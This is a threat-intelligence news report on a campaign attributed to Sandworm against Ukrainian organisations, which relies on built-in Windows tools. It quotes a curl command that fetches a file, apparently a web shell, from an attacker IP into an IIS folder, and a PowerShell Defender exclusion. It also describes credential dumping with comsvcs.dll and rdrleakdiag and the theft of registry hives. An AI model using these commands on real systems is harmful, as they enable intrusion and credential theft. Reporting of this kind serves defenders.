Russian Hackers Employ Stealthy Tactics to Infiltrate Government Networks
Ukrainian government organizations are facing persistent cyber threats from Russian-backed actors employing sophisticated evasion techniques to maintain prolonged access to critical networks. Recent investigations have revealed coordinated campaigns targeting essential infrastructure and government entities, with attackers utilizing advanced methods to circumvent traditional security defenses.
These operations signify a notable escalation in cyberattack strategies, focusing on credential harvesting and the extraction of sensitive information rather than immediate destructive actions. This strategic shift allows threat actors to conduct extensive reconnaissance and maintain covert presence within networks for extended periods.
Analysts have identified two significant intrusion incidents: a two-month operation against a large business services organization and a week-long campaign targeting local government infrastructure. The attackers exhibit exceptional operational security awareness, minimizing malware deployment and primarily relying on legitimate Windows administration tools and dual-use utilities to evade detection.
The campaign appears linked to Sandworm, a Russian military intelligence unit under the GRU, known for destructive attacks against critical infrastructure, including power grids and satellite communications networks.
Living-Off-the-Land Credential Harvesting Mechanisms
The sophisticated evasion methodology employed by these threat actors reveals their deep understanding of modern security implementations. Upon gaining initial access, attackers executed reconnaissance commands using built-in Windows utilities, such as:
– `cmd.exe /c curl [malicious IP]:22065/service.aspx > C:\inetpub\wwwroot\aspnet_client\service.aspx`
– `powershell Add-MpPreference -ExclusionPath CSIDL_PROFILE\downloads`
By disabling Windows Defender scanning on the Downloads folder, attackers required administrative privileges. They then created scheduled tasks executing every thirty minutes using legitimate `rundll32.exe` with `comsvcs.dll` to perform memory dumps, extracting credentials stored in process memory.
The threat actors specifically targeted KeePass password vault processes through enumeration commands, demonstrating precise targeting of credential repositories. Advanced evasion continued through the utilization of the Windows Resource Leak Diagnostic tool (`rdrleakdiag`) for memory dumping operations, a seldom-used technique designed to evade security monitoring systems.
Registry hive exfiltration through native `reg.exe` commands enabled additional credential and configuration data extraction. The campaign showcases threat actors prioritizing stealth over speed, employing legitimate administration tools to maintain attribution ambiguity while systematically harvesting sensitive organizational data throughout extended network access periods.
